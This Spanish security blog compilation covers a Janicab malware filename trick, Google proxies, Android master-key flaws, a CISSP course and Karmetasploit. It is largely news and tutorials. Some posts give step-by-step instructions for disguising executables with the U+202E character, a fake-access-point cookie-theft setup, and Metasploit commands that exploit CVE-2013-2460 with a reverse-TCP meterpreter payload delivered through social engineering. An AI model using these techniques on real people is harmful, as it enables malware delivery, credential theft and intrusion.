Janicab.A y el truco del carácter U+202E

Estaba leyendo acerca de una nueva familia de malware que puede propagarse tanto en Windows como en OS X. A parte de eso, me llamó también la atención que Janicab.A, como se conoce al troyano, también utiliza un viejo truco para engañar al usuario: el carácter especial Unicode U+202E conocido como una anulación de derecha a izquierda para hacer que el archivo malicioso aparezca como un documento PDF en lugar de un archivo ejecutable potencialmente peligroso.

Nada más fácil de realizarse. Por ejemplo, imagina que nuestro server es cmd.exe:

1. Abrimos el mapa de caracteres de Windows (inicio, ejecutar, charmap)


2. Buscamos y copiamos el carácter Unicode U+202E. Fijaros que en la parte inferior izquierda se muestra el valor ASCII de los caracteres.



3. Pegamos (Ctrl+V) el carácter justo antes del punto de la extensión: cmd[[Unicode U+202E]].exe


4. Escribimos la extensión que queremos pero al revés, por ejemplo, si queremos "doc" escribiremos "cod" o si queremos "pdf" escribiremos "fdp".

Y al final el resultado visual será cmdexe.doc:



Por último para "endulzar" el vector de infección simplemente tendríamos que cambiar el icono con reshack u otro y utilizar un nombre algo más disimulado teniendo en cuenta que el "exe" o la extensión original debe permanecer. Por ejemplo:


Cómo usar Google como servidor proxy

Hoy en día podemos querer usar Google para evadir puntualmente un molesto paywall u ocultar simplemente nuestra IP para cualquier pequeña diablura. A continuación os dejo una serie de servicios de Goliat para que David pueda hacer uso y disfrute para sus maléficos propósitos...

1. Google Translate


Es el "proxy Google" más popular y muestra la páginas como las originales, aceptando imágenes y CSS. Simplemente pon como destino (parámetro tl) el mismo lenguaje de la página original y como origen (sl) cualquier otro:

http://translate.google.com/translate?sl=ja&tl=es&u=http://hackplayers.com/

2. Google Mobilizer 

 
Aunque Google ha discontinuado este servicio en el dominio .com todavía esta disponible en otros como .ie o .es. En este caso no se cargan hojas de estilo pero es ideal para la carga rápida y lectura de grandes textos. Además para mejorar la velocidad permite desactivar la carga de imágenes:

http://www.google.es/gwt/x?u=http://hackplayers.com

3. Google Modules

Gmodules.com es normalmente utilizado para alojar gadgets pero puede ser utilizado como un proxy que además permite descargar archivos (como PDFs, .MP4 videos, etc.) además de visualizar normalmente páginas web:

http://www.gmodules.com/ig/proxy?url=http://hackplayers.com

4. Google Caché

Otra forma ver el contenido de una página web es acceder al caché de los servidores de Google. Eso sí normalmente se trata de una captura de pantalla de la página tal como esta se mostraba un día atrás y es posible que la página haya sufrido modificaciones durante ese tiempo:


http://webcache.googleusercontent.com/search?q=cache:www.hackplayers.com

5. Servidor proxy propio


Finalmente también puedes crear tu propio servidor proxy usando este Google Script o el más avanzado Google App Engine


Fuente: Use Google as a Proxy Server to Bypass Paywalls, Download Files

Solución al reto 17 de Toulouse

En nuestro último reto de esteganografía (Reto 17: Toulouse) queríamos utilizar una técnica de Martin Fiedler que nos pareció muy pero que muy interesante: la posibilidad de ocultar volúmenes cifrados de Truecrypt dentro de vídeos en formato QuickTime/MP4.
Pensarlo un momento, está muy bien tener un volumen cifrado en el disco pero está aún mejor que además no se encuentre a la vista de miradas indiscretas... ;)

Una opción es crear un volumen oculto con Truecrypt pero es algo arriesgado si tenemos en cuenta la facilidad con la que podemos llegar a sobrescribirlo. Otra es utilizar nombres de ficheros como pagefile.sys o hiberfil.sys aunque cantaría demasiado su presencia en discos extraíbles. Pero hay otra mejor: hoy en día los vídeos están en todas partes y ocupan gigas y gigas con la llegada de la alta definición. Además gracias a los encoders actuales por mucho bitrate que tenga un video con respecto a otro es dificil de apreciar la diferencia de calidad, por no hablar de detectar un bloque de datos aleatorios dentro de un binario... ¡por todo eso los vídeos son una excelente alternativa!


Grampus: una herramienta multiplataforma de extracción de metadatos y footprinting

La semana pasada tuve la oportunidad de probar la versión alpha de Grampus, una herramienta multiplataforma de extracción de metadatos y footprinting, algo así como una FOCA en python y de código abierto. Desde haces meses The_Pr0ph3t y SankoSK y otros desarrolladores como sniferl4bs, don_once, OverxFlow o Kodeinfect han estado trabajando duramente para por fin publicar la versión beta. Os recomiendo echarle un vistazo y colaborar en el betatesting y mejora de esta prometedora herramienta:



Grampus Project nace para todos aquellos usuarios que necesitan automatizar sus procesos en auditorias web. Como sabemos la recopilación de información a la hora de realizar un ataque a un objetivo es esencial y a veces este proceso puede ser muy largo y pesado.

Fear the FOCA, de Chema Alonso y su equipo, cubre las necesidades de automatización que necesitamos a la hora del proceso de Fingerprinting y la extracción y el análisis de metadatos lo que no cubre es algo para muchos esencial, la cómoda multiplataforma.

Muchos somos usuarios Linux y nos resulta complicado tener que rompernos el coco para emularlo con WINE o incluso virtualizarlo en una maquina virtual con entorno Windows...

Es por todo esto que nace Grampus Project , para poder cubrir nuestras necesidades.

Android incorpora código de la NSA desde 2011

Sí amigos, el sistema operativo de código abierto de Google incorpora código de la NSA desde 2011, si bien no se trata de un "backdoor" si no de algunas mejoras de seguridad para Android según Bloomberg para "aislar las aplicaciones para evitar que hackers y los comerciantes tengan acceso a los datos personales o corporativos almacenados en un dispositivo".

El portavoz de Google Gina Scigliano confirmó que Android ya está incorporando código de la NSA que ha estado trabajando en una rama de su proyecto Linux SE (Security-Enhanced), pero hizo hincapié en el hecho de que, "todo el código de Android y de sus contribuyentes está a disposición del público para su consulta en source.android.com."

Sinceramente no creo que la NSA se arriesgue a introducir código en el SO para el espionaje... demasiadas miradas atentas y más aún después del escándalo de PRISM. Sin embargo y como he leído en cierto comentario, el hardware de un smartphone carga en tiempo de ejecución muchas librerías que no liberan el código a efectos prácticos y, por ejemplo, este hardware se comunica con puntos de acceso y repetidores para recepción y tono de llamadas. Estas tareas incluyen actualizaciones y comandos como el pasivo "turn mic on". La suma de la interacción entre el hardware de un dispositivo y la red telefónica es más interesante para la NSA...

Libro: Worm: The First Digital World War

Se acercan las vacaciones y llevar un buen libro puede ser un gran entretenimiento para esos días de tumbona en la playita. Ando viendo algunos títulos y este parece interesante. Worm: The First Digital World War es un libro del autor de Black Hawk derribado (de la que se basó la peli de Ridley Scott) y viene a contarnos la batalla entre quienes están decididos a explotar Internet y los que tienen como cometido protegerla - la guerra que tiene lugar literalmente bajo nuestros dedos...

El gusano Conficker infectó su primer equipo en noviembre de 2008 y en un mes se había infiltrado en 1,5 millones de ordenadores de 195 países. Los bancos, las compañías de telecomunicaciones y las redes críticas de algunos gobiernos (incluido el Parlamento británico y el ejército francés y alemán) se infectaron. Nadie había visto nunca nada igual. En enero de 2009, el gusano estaba escondido en al menos ocho millones de ordenadores y la botnet de ordenadores conectados que había creado era lo suficientemente grande que uno de sus ataques podría bloquear el mundo. Esta es la apasionante historia del grupo de hackers, investigaciones, empresarios millonarios de Internet y expertos en seguridad informática que se unieron para defender Internet del gusano Conficker: la historia de la primera guerra mundial digital.


Ver libro en Amazon

Hora de parchear el bug 8219321 de Android (master keys)

La semana pasada hablábamos del bug 8219321 de Android (master keys) que permitía modificar un apk sin romper su firma criptográfica. 

Esto es debido a que un Map en Android/Java sólo puede devolver un único objeto para una clave dada, por lo que el truco está en crear dos entradas con el mismo nombre de forma que la función getInputStream sólo pueda verificar el correcto. 

Os recomiendo echar un vistazo al detalle técnico de Al Sutton y a la PoC de Pau Oliva (¡geniales!).

Afortunadamente ya están corrijiendo el problema que afecta a unos 900 millones de dispositivos con Android. 


Google ya ha implementado la solución en el código base del Galaxy S4 y HTC One a partir de Android 4.2.2 aunque el resto de dispositivos tendrán que esperar.  

Mejor pinta la cosa para los que utilizamos CyanogenMod que añade el parche en el código ZipFile.java y ZipFileTest.java de la última nightly build (ya sabéis, aquella que incluye todos los cambios realizados durante el día). 

Curso gratuito de preparación para el CISSP valorado en 3000 euros

IT Masters y la Universidad Charles Sturt están ofreciendo de forma gratuita un curso on-line para preparar la certificación CISSP (Certified Information Systems Security Professional) similar a otros que pueden llegar a costar hasta 3000 euros.

El curso se desarrolla durante seis semanas a partir del próximo miércoles 17 de julio, con conferencias a través de webinars semanales de 90 minutos de 12:30-14:00 hora AEST cada miércoles. Además, a los estudiantes se les pide que hagan un total de 10 a 12 horas de estudio entre los webinars.

Aunque se dispondrá de una gran variedad de materiales de referencia online se recomienda adquirir la Guía Oficial (ISC)2 de CISSP CBK (63,40 en Amazon). El curso culminará con un examen de certificación CISSP práctico: un examen "a libro abierto" programado que los estudiantes podrán hacer desde su propia casa. Adicionalemente los estudiantes que completen el curso y consigan la certificación CISSP obtendrán además un crédito para el Master de Seguridad SI o el Master de Administración (IT-Seguridad) de la Universidad Charles Sturt.

No obstante avisaros de que el propio CEO de IT Masters, Martin Hale, dijo que al término del curso algunos estudiantes estarán dispuestos a hacer el examen de certificación CISSP pero que la mayoría tendrá que reforzar sus estudios: "El examen de certificación CISSP es uno de los más duros de la industria, razón de por qué es tan apreciada por los empleadores. 250 preguntas durante más de seis horas y la necesidad de obtener al menos el 70% para aprobar hacen necesario asegurarse de estar preparado".

El Masters Curso de Certificación CISSP IT está dirigido a:

- profesionales de la seguridad que están interesados ​​en la comprensión de los conceptos tratados en el examen CISSP
- gerentes que tal vez no quieran obtener la certificación CISSP, pero quieren comprender las áreas críticas de la red y el sistema de seguridad
- administradores de red que desean entender las aplicaciones pragmáticas de los 10 dominios del conocimiento de CISSP
- profesionales de la seguridad y administradores que busquen maneras prácticas de aplicar los 10 dominios de conocimiento del CISSP en su trabajo actual.

Para más información:

    www.itmasters.edu.au/free-short-course-cissp-security
    www.itmasters.edu.au

Fuente:  $3000 cyber security course for free

Las #CuentasDelPP filtradas, café y un análisis pendiente

La noche se presenta "calentita" en las redes sociales con la noticia de que ha sido filtrada la contabilidad del PP desde 1990 a 2011. Un breve texto publicado en anonyourvoice.com proclamaba la publicación "Cables contables PPgoteras Lo que debería ser público, será público" y adjuntaba un enlace por cada uno de los años contables, recordemos unas cuentas que el PP negó tener ante el juez Ruz... Actualmente estos enlaces ya no se encuentran disponibles en Anonyourvoice.com, si bien existen numerosos mirrors que van creciendo como la pólvora.


#WeNeedMoreHackers es un hashtag *exageradamente sensacionalista* que pide ayuda para convertir los numerosos PDF escaneados en texto legible para un mejor análisis por la inteligencia colectiva, un llamamiento para un crowdworking a lo bestia. Por otro lado #CuentasDelPP va camino de convertirse en trending topic en España.

Introducción a Karmetasploit

Karmetasploit es una interesante función dentro de Metasploit que sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar información y llevar a cabo ataques de navegador contra los clientes.

Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente Karmetasploit intentará ejecutar todos los exploits sobre la máquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión de meterpreter.

Empezaremos descargando Karmetasploit y luego instalaremos dhcpd3-server:

sudo apt-get install isc-dhcp-server

Una ves instalado el servidor DHCP procederemos a configurarlo, quedando de la siguiente manera:

#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#  range 10.0.0.100 10.0.0.254;
#  option routers 10.0.0.1;
#}

Luego procedemos a editar /opt/backbox/msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.

Javapocalipsis: ¿qué pasaría si Java fuera "apagado" de repente?

Increíble el vídeo de presentación de la conferencia Javazone que tendrá lugar los próximos 11 y 12 de septiembre en Oslo Spektrum: 

Grave vulnerabilidad en Android permite modificar las aplicaciones sin cambiar su firma

Sin duda una de las noticias del día es que han descubierto una vulnerabilidad que puede suponer que el 99% de los dispositivos Android sean vulnerables. Sus descubridores han sido los investigadores de Bluebox Security y se trata de la posibilidad de modificar el código de un APK sin romper la firma criptográfica de la aplicación. Todavía no se sabe bién cómo, si con una clave maestra u otra técnica, pero el detalle de la vulnerabilidad y cómo explotarlo serán presentados en la conferencia Black Hat USA 2013 del próximo mes.

El bug fue reportado a Android en febrero de este año (8219321) y afecta a todas las versiones desde Android 1.6 Donut, es decir, a todas desde hace 4 años


Si bien parece que algunos fabricantes ya están actualizando sus firmwares como el del Samsung Galaxy S4, hay otros que todavía tienen una asignatura pendiente como increiblemente los Nexus de Google. Por otro lado muchos dispositivos permanecerán vulnerables porque han alcanzado su end-of-life y no son soportados, por lo que el asunto se presenta serio.

La única nota positiva es que Google desde hace tiempo ya no permite actualizar las aplicaciones de su Play Store fuera de sus mecanimos de actualización, por lo que instalar aplicaciones desde el mercado aplicaciones "oficial" puede considerarse seguro. La única excepción serían todos aquellos en los que los gobiernos autoritarios no permiten directamente acceeder al Play Store u otras que tienen cierto gusto por aplicaciones que no son permitidad por Google, como aquellas con contenido pornográfico...

Fuentes:

900 million Android phones vulnerable to hacking from 'master key'
Uncovering Android Master Key That Makes 99% of Devices Vulnerable
Bluebox reveals Android security hole, may affect 99 percent of devices
Here’s why most users won’t be affected by the latest Android flaw
Vulnerability allows attackers to modify Android apps without breaking their signatures

CVE-2013-2460 Java Applet ProviderSkeleton Insecure Invoke Method


Este módulo de Metasploit abusa el método inseguro invoke()  de la clase de ProviderSkeleton que permite para llamar a métodos estáticos arbitrarios con argumentos de usuario. La vulnerabilidad afecta a la versión Java 7u21 y versiones anteriores.

Explotando CVE-2013-2460 con metasploit:

// Cargamos el módulo
msf > use exploit/multi/browser/java_jre17_provider_skeleton

// Cargamos el payload para el meterpreter
msf exploit(java_jre17_provider_skeleton) > set PAYLOAD java/meterpreter/reverse_tcp

//
msf exploit(java_jre17_provider_skeleton) > set LHOST [IP Local]

//
msf exploit(java_jre17_provider_skeleton) > set srvhost [IP Local]

//
msf exploit(java_jre17_provider_skeleton) > set uripath /

//
msf exploit(java_jre17_provider_skeleton) > exploit



Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.


Contribución gracias a Stuxnet Hack

Ventanas a la red

Pilar :)
Todos estamos al día en lo que va ocurriendo en Seguridad Informática, leemos los feeds (ahora sin reeader), las listas de correos, nos bajamos los últimos PDFs publicados, y seguimos en Twitter a otros compañeros de seguridad para estar informados hasta el último segundo.

Ahora gracias a Pilar Movilla en Ventanas en la red, tenemos un nuevo punto de encuentro en Internet, una radio que nos acerca un poquito más la información, las anécdotas, y las curiosidades de grandes profesionales en seguridad, -y he escuchado que también las de algún novato.- Con la comodidad de poder escucharlo en nuestro mp3, mientras vamos en el coche a trabajar o nos desplazamos en transporte público.

¿Qué vamos a poder encontrar?

Podremos conocer curiosidades, como que Chema Alonso no pensaba dedicarse a la seguridad informática.

Lorenzo Martinez, aguantando la risa, mientras nos cuenta la experiencia de un usuario con problemas de red, y un cable “pillado” con una puerta.

César Lorenzana, del Grupo de Delitos Telemáticos de la guardia civil, hablando de seguridad desde “el otro lado”.

La voz de Wardog, aprovechando para seguir haciéndonos reír.

Mi admirado, y respetado Angelucho, transmitiendo seguridad informática, a un nivel, entendible por todo el mundo. Sabiendo hacerse comprender.

Juan Antonio Calles y Pablo González, acercando al público Flu Project, y algunos casos en los que han participado.

Jaime Sanchez, Pablo San Emeterio, Oscar Calvo y Juan Carlos García, destripando la red. Cuatro hackers de altura, dando su visión de la red.

En el último programa he tenido el honor de participar, con unos compañeros estupendos  ellos son: Mónica Boto, Óscar Sánchez, Roberto García, y el que escribe, Adrián Pulido. En este programa estupendo  que todo el mundo debe descargar, hablamos la nueva hornada, sobre los retos que nos encontramos.

¡Y mucho más! Aquí tenéis los podcast, para disfrutar durante horas.

Aprovecho la otra ventana que ahora me presta Vicente, para dar las gracias a Pilar por hacer el día tan divertido, prestarse a entrevistarnos, y tratarnos genial. A todas las personas que están detrás del programa de radio “tras las cámaras”. Y sin lugar a duda, a mi padre virtual, Angelucho, que soy consciente todo lo que hace por mi // nosotros.

WiNSoCk